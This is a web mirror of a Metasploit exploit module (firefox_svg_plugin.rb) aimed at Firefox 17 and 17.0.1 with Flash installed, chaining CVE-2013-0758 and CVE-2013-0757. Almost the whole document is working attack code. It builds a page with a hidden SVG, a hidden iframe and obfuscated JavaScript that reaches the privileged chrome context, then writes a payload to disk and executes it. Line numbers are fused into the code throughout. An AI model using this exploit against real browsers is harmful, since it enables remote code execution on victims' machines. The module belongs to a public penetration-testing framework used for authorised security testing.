CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/browser/firefox_svg_plugin.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::BrowserExploitServer9include Msf::Exploit::EXE10# include Msf::Exploit::Remote::BrowserAutopwn11include Msf::Exploit::Remote::FirefoxPrivilegeEscalation1213# autopwn_info({14# :ua_name => HttpClients::FF,15# :ua_minver => "17.0",16# :ua_maxver => "17.0.1",17# :javascript => true,18# :rank => NormalRanking19# })2021def initialize(info = {})22super(update_info(info,23'Name' => 'Firefox 17.0.1 Flash Privileged Code Injection',24'Description' => %q{25This exploit gains remote code execution on Firefox 17 and 17.0.1, provided26the user has installed Flash. No memory corruption is used.2728First, a Flash object is cloned into the anonymous content of the SVG29"use" element in the <body> (CVE-2013-0758). From there, the Flash object30can navigate a child frame to a URL in the chrome:// scheme.3132Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper33around the child frame's window reference and inject code into the chrome://34context. Once we have injection into the chrome execution context, we can write35the payload to disk, chmod it (if posix), and then execute.3637Note: Flash is used here to trigger the exploit but any Firefox plugin38with script access should be able to trigger it.39},40'License' => MSF_LICENSE,41'Targets' => [42[43'Universal (Javascript XPCOM Shell)', {44'Platform' => 'firefox',45'Arch' => ARCH_FIREFOX46}47],48[49'Native Payload', {50'Platform' => %w{ java linux osx solaris win },51'Arch' => ARCH_ALL52}53]54],55'DefaultTarget' => 0,56'Author' =>57[58'Marius Mlynski', # discovery & bug report59'joev', # metasploit module60'sinn3r' # metasploit fu61],62'References' =>63[64['CVE', '2013-0758'], # navigate a frame to a chrome:// URL65['CVE', '2013-0757'], # bypass Chrome Object Wrapper to talk to chrome://66['OSVDB', '89019'], # maps to CVE 2013-075767['OSVDB', '89020'], # maps to CVE 2013-075868['URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-15.html'],69['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=813906']70],71'DisclosureDate' => '2013-01-08',72'BrowserRequirements' => {73:source => 'script',74:ua_name => HttpClients::FF,75:ua_ver => /17\..*/,76:flash => /[\d.]+/77}78))7980register_options(81[82OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] ),83OptBool.new('DEBUG_JS', [false, "Display some alert()'s for debugging the payload.", false])84], Auxiliary::Timed)8586end8788def on_request_exploit(cli, request, info)89if request.uri =~ /\.swf$/90# send Flash .swf for navigating the frame to chrome://91print_status("Sending .swf trigger.")92send_response(cli, flash_trigger, { 'Content-Type' => 'application/x-shockwave-flash' })93else94# send initial HTML page95print_status("Target selected: #{target.name}")96print_status("Sending #{self.name}")97send_response_html(cli, generate_html(cli, target))98end99end100101# @return [String] the contents of the .swf file used to trigger the exploit102def flash_trigger103swf_path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-0758.swf")104@flash_trigger ||= File.read(swf_path)105end106107# @return [String] containing javascript that will alert a debug string108# if the DEBUG is set to true109def js_debug(str, quote="'")110if datastore['DEBUG_JS'] then "alert(#{quote}#{str}#{quote})" else '' end111end112113# @return [String] HTML that is sent in the first response to the client114def generate_html(cli, target)115vars = {116:symbol_id => 'a',117:random_domain => 'safe',118:payload => run_payload, # defined in FirefoxPrivilegeEscalation mixin119:payload_var => 'c',120:payload_key => 'k',121:payload_obj_var => 'payload_obj',122:interval_var => 'itvl',123:access_string => 'access',124:frame_ref => 'frames[0]',125:frame_name => 'n',126:loader_path => "#{get_module_uri}.swf",127:content => self.datastore['CONTENT'] || ''128}129script = js_obfuscate %Q|130var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};131var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];132function $() {133document.querySelector('base').href = "http://www.#{vars[:random_domain]}.com/";134}135function _() {136return '#{vars[:frame_name]}';137}138var #{vars[:interval_var]} = setInterval(function(){139try{ #{vars[:frame_ref]}['#{vars[:access_string]}'] }140catch(e){141clearInterval(#{vars[:interval_var]});142var p = Object.getPrototypeOf(#{vars[:frame_ref]});143var o = {__exposedProps__: {setTimeout: "rw", call: "rw"}};144Object.prototype.__lookupSetter__("__proto__").call(p, o);145p.setTimeout.call(#{vars[:frame_ref]}, #{vars[:payload_var]}, 1);146}147}, 100);148document.querySelector('object').data = "#{vars[:loader_path]}";149document.querySelector('use').setAttributeNS(150"http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"151);152|153154%Q|155<!doctype html>156<html>157<head>158<base href="chrome://browser/content/">159</head>160<body>161162<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>163<symbol id="#{vars[:symbol_id]}">164<foreignObject>165<object></object>166</foreignObject>167</symbol>168<use />169</svg>170171<script>172#{script}173</script>174175<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"176name="#{vars[:frame_name]}"></iframe>177#{vars[:content]}178</body>179</html>180|181end182end183184185